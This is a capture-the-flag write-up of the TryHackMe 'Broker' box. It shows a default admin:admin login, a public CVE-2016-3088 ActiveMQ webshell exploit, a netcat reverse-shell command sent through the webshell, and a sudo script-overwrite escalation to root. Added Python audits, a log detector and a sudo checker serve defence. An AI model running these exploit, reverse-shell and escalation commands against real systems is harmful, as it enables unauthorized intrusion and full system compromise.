BROKER EASY WRITEUP
BOX DESCRIPTION:-
⭐It's a Medium box, but it's not a medium box🙂 it's a too easy box😏
⭐User flag via an outdated-software CVE exploit
⭐Root flag via a misconfiguration
Enumeration:
As usual, I start with an nmap scan 😅
Nmap
Initial nmap scan: nmap -sV -sC <IP> -A
Result:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=
| 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
No port 80 or 8080.
Cool, let's run a full port scan with nmap.
I recommend Masscan or Rustscan instead of nmap for full port scans;
they are faster than an nmap port scan.
Nmap Port Scan
nmap -p 1000-10000 10.10.110.80 -vv
because that range was mentioned in the room.
Result:
PORT STATE SERVICE REASON
1883/tcp open mqtt syn-ack
8161/tcp open patrol-snmp syn-ack
Sweet... we got ports 1883 and 8161.
Port 1883 is MQTT.
Port 8161 I don't know, ok let's enumerate it :)
PORT 8161
Main page (screenshot)
Yep, it's a mobile screenshot; I forgot to take pictures on my laptop and now my laptop is dead🚶 so
wow, it's an HTTP port!! And it also has a sign-in option.
Let's try default username/passwords
like admin:password
admin:admin
Admin page (screenshot)
Wow!! We are in the admin panel.
It's an ActiveMQ site; check the admin page properly and we get the version info.
It's ActiveMQ version 5.9.0.
It's outdated software, and we have lots of exploits on GitHub and in Metasploit.
I know the Metasploit exploit did not work for me 💔
It's a pretty easy box, so we use a GitHub exploit.
I am using this exploit, it's perfect ❤️
Copy this😁
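Two things made this foothold possible: the web console still accepted a shipped default login, and the ActiveMQ build was old enough (before 5.14.0) to still mount the fileserver webapp that CVE-2016-3088 abuses. The following audit script is an added example written for this writeup, not code from the room or from the ActiveMQ project. It parses conf/jetty-realm.properties for users whose password is still the stock default and checks conf/jetty.xml for a WebAppContext mounted at /fileserver. The two sample config fragments are constructed to mirror the 5.x default layout (an assumption; point the functions at your real conf/ files).

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of conf/jetty-realm.properties, modelled on the stock
# ActiveMQ 5.x format "username: password [,rolename ...]" (assumed layout).
SAMPLE_REALM = """\
# Defines users that can access the web (console, demo, etc.)
# username: password [,rolename ...]
admin: admin, admin
user: user, user
"""

# Constructed fragment of conf/jetty.xml; the /fileserver WebAppContext is the
# servlet CVE-2016-3088 abuses and is what hardening removes (assumed layout).
SAMPLE_JETTY_XML = """\
<beans>
  <bean id="handlers" class="org.eclipse.jetty.server.handler.HandlerCollection">
    <property name="handlers">
      <list>
        <bean class="org.eclipse.jetty.webapp.WebAppContext">
          <property name="contextPath" value="/admin" />
          <property name="resourceBase" value="${activemq.home}/webapps/admin" />
        </bean>
        <bean class="org.eclipse.jetty.webapp.WebAppContext">
          <property name="contextPath" value="/fileserver" />
          <property name="resourceBase" value="${activemq.home}/webapps/fileserver" />
        </bean>
      </list>
    </property>
  </bean>
</beans>
"""

# Username/password pairs that ship in the stock realm file.
DEFAULT_WEB_CREDS = {("admin", "admin"), ("user", "user")}


def parse_realm(text):
    """Parse jetty-realm.properties into {username: (password, [roles])}."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        m = re.match(r"^([^:=\s]+)\s*[:=]\s*(.*)$", line)
        if not m:
            continue
        user, rest = m.group(1), m.group(2)
        parts = [p.strip() for p in rest.split(",")]
        users[user] = (parts[0], parts[1:])
    return users


def default_web_creds(text):
    """Return the users whose password is still the shipped default."""
    return sorted(
        user for user, (pw, _roles) in parse_realm(text).items()
        if (user, pw) in DEFAULT_WEB_CREDS
    )


def fileserver_enabled(xml_text):
    """True if jetty.xml still mounts a WebAppContext at /fileserver."""
    root = ET.fromstring(xml_text)
    for bean in root.iter("bean"):
        if not bean.get("class", "").endswith("WebAppContext"):
            continue
        for prop in bean.findall("property"):
            if prop.get("name") == "contextPath" and prop.get("value") == "/fileserver":
                return True
    return False


def version_is_vulnerable(version, fixed="5.14.0"):
    """Dotted-version compare; the fileserver webapp was removed in 5.14.0."""
    as_tuple = lambda v: tuple(int(x) for x in v.split("."))
    return as_tuple(version) < as_tuple(fixed)


if __name__ == "__main__":
    print("default web creds:", default_web_creds(SAMPLE_REALM))
    print("fileserver mounted:", fileserver_enabled(SAMPLE_JETTY_XML))
    print("5.9.0 affected:", version_is_vulnerable("5.9.0"))
```

Any user returned by default_web_creds needs a new password in jetty-realm.properties, and on builds older than 5.14.0 the /fileserver bean should be deleted from jetty.xml (or the broker upgraded) so that the console cannot be used to write files.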
git clone https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088
STEPS TO EXPLOIT ActiveMQ 5.9.0
1) cd ActiveMQ_putshell-CVE-2016-3088
2) python ActiveMQ_putshell.py -u http://<$IP>:8161
OUTPUT:
[ASCII-art banner printed by the tool, not reproduced]
ActiveMQ_put_path:/opt/apache-activemq-5.9.0/webapps/
ActiveMQ_put__txt:http://10.10.110.80:8161/fileserver/guo.txt
ActiveMQ_putshell:http://10.10.110.80:8161/admin/guo.jsp
Our webshell uploaded successfully 🙂
Let's check it.
Copy my command for a reverse shell.
First I tried a bash reverse shell but it did not work😔
Hopefully the victim machine has netcat 😌
Command:
http://<$IP>:8161/admin/guo.jsp?pwd=gshell&shell=nc%20<YOUR IP>%209001%20-e%20/bin/sh
Be sure to update your IPs and listen on your local machine 😜
Baaaang💨!!! Got a reverse connection.
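From the defender's side, everything the exploit did above leaves a trace in the web request log: a write to /fileserver/ followed by a hit on a JSP under /admin/ that the stock console never shipped. The detector below is an added example for this writeup, not part of the original post or the ActiveMQ project. It assumes Jetty's NCSA request-log format (which ActiveMQ's embedded Jetty can be configured to write) and a partial allowlist of stock admin JSPs; the log lines are constructed, not taken from the box.

```python
import re
from collections import namedtuple

# NCSA common/combined request-log line as Jetty's NCSARequestLog writes it
# (ActiveMQ's embedded Jetty can be configured to emit this; assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not from the box): a normal console visit, the
# write/rename pair CVE-2016-3088 relies on, and a hit on the resulting JSP.
SAMPLE_LOG = """\
10.10.14.5 - admin [14/Jan/2022:10:15:30 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 5120
10.10.14.5 - - [14/Jan/2022:10:15:32 +0000] "PUT /fileserver/guo.txt HTTP/1.1" 204 0
10.10.14.5 - - [14/Jan/2022:10:15:33 +0000] "MOVE /fileserver/guo.txt HTTP/1.1" 204 0
10.10.14.5 - admin [14/Jan/2022:10:15:35 +0000] "GET /admin/guo.jsp?pwd=x&shell=id HTTP/1.1" 200 87
10.10.14.9 - admin [14/Jan/2022:10:16:01 +0000] "GET /admin/index.jsp HTTP/1.1" 200 4011
"""

# Partial allowlist of JSPs that ship with the stock admin console; an
# assumption here, so extend it from your deployed webapps/admin directory.
KNOWN_ADMIN_JSPS = {
    "index.jsp", "queues.jsp", "topics.jsp", "subscribers.jsp", "network.jsp",
    "connections.jsp", "scheduled.jsp", "send.jsp", "browse.jsp", "message.jsp",
}

Alert = namedtuple("Alert", "ip method target reason")


def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not NCSA."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return alerts for fileserver writes and unexpected JSPs under /admin/."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].split("?", 1)[0]  # drop the query string
        if rec["method"] in ("PUT", "MOVE", "DELETE") and path.startswith("/fileserver/"):
            alerts.append(Alert(rec["ip"], rec["method"], path,
                                "write to fileserver webapp (CVE-2016-3088 pattern)"))
        elif path.startswith("/admin/") and path.endswith(".jsp"):
            if path.rsplit("/", 1)[1] not in KNOWN_ADMIN_JSPS:
                alerts.append(Alert(rec["ip"], rec["method"], path,
                                    "JSP outside the stock admin console (possible dropped shell)"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a.ip, a.method, a.target, "->", a.reason)
```

A cheaper control than log review is to compare the JSP files under webapps/admin against the shipped distribution; any file that was not in the original archive is worth an incident ticket.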
USER FLAG
activemq@activemq:/opt/apache-activemq-5.9.0$ ls
ls
LICENSE activemq-all-5.9.0.jar conf lib subscribe.py
NOTICE bin data start.sh tmp
README.txt chat.py flag.txt subcribe.py webapps
activemq@activemq:/opt/apache-activemq-5.9.0$ cat flag.txt
cat flag.txt
THM{youXXXXXXXX}
activemq@activemq:/opt/apache-activemq-5.9.0$
ROOT FLAG
Run sudo -l to check what we are permitted to run as root🔥
sudo -l
Matching Defaults entries for activemq on activemq:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User activemq may run the following commands on activemq:
(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
Cool, we can run /opt/apache-activemq-5.9.0/subscribe.py with sudo.
Here is the payload for privilege escalation.
Copy, paste😁
echo "import os" > subscribe.py
echo 'os.system("bash")' >> subscribe.py
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
BOOOM! Haha, we are ROOT.
root@activemq:~# cat root.txt
cat root.txt
THM{brXXXXXXXX}
root@activemq:~#
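The root step worked only because the script named in the sudoers rule was writable by the same low-privilege user allowed to run it. The checker below is an added example for this writeup, not code from the room. It splits a NOPASSWD rule like the one sudo -l printed, then decides from the file's mode bits and ownership (not os.access, which answers yes to everything when run as root) whether the invoking user could edit the script or replace it through a writable parent directory. The demo recreates the layout in a temporary directory, so the paths and modes are constructed.

```python
import os
import stat
import tempfile

# Constructed copy of the rule `sudo -l` showed on the box; the only thing
# sudo lets the user run is an interpreter plus a script path, so the question
# is who can change that script.
SAMPLE_RULE = "(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py"


def rule_targets(rule):
    """Split a NOPASSWD rule into (interpreter, [arguments])."""
    cmd = rule.split("NOPASSWD:", 1)[1].strip()
    parts = cmd.split()
    return parts[0], parts[1:]


def writable_by(path, uid, gids):
    """Mode-bit check: can a user with this uid/gid set write to path?"""
    st = os.stat(path)
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return st.st_uid == uid and bool(mode & stat.S_IWUSR)


def script_hijackable(script, uid, gids):
    """True if the script can be edited, or swapped out because its directory is writable."""
    return (writable_by(script, uid, gids)
            or writable_by(os.path.dirname(script), uid, gids))


def audit_rule(rule, uid, gids, exists=os.path.exists):
    """Return the absolute-path arguments of the rule that the user could tamper with."""
    _interp, args = rule_targets(rule)
    return [a for a in args
            if a.startswith("/") and exists(a) and script_hijackable(a, uid, gids)]


def demo(workdir=None):
    """Recreate the box layout (constructed) and audit it for the owner and for a stranger."""
    workdir = workdir or tempfile.mkdtemp()
    script = os.path.join(workdir, "subscribe.py")
    with open(script, "w") as f:
        f.write("print('subscribe')\n")
    os.chmod(workdir, 0o755)
    os.chmod(script, 0o644)  # owner-writable, like the script on the box
    rule = f"(root) NOPASSWD: /usr/bin/python3.7 {script}"
    me = os.getuid()
    owner_findings = audit_rule(rule, me, [os.getgid()])
    stranger_findings = audit_rule(rule, me + 1, [])
    return owner_findings, stranger_findings


if __name__ == "__main__":
    owner, stranger = demo()
    print("hijackable by the script owner:", owner)
    print("hijackable by an unrelated user:", stranger)
```

The fix that makes the rule safe is to have root own both the script and its directory with mode 0o755, so the sudo user can run it but not change what it does.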
That's it.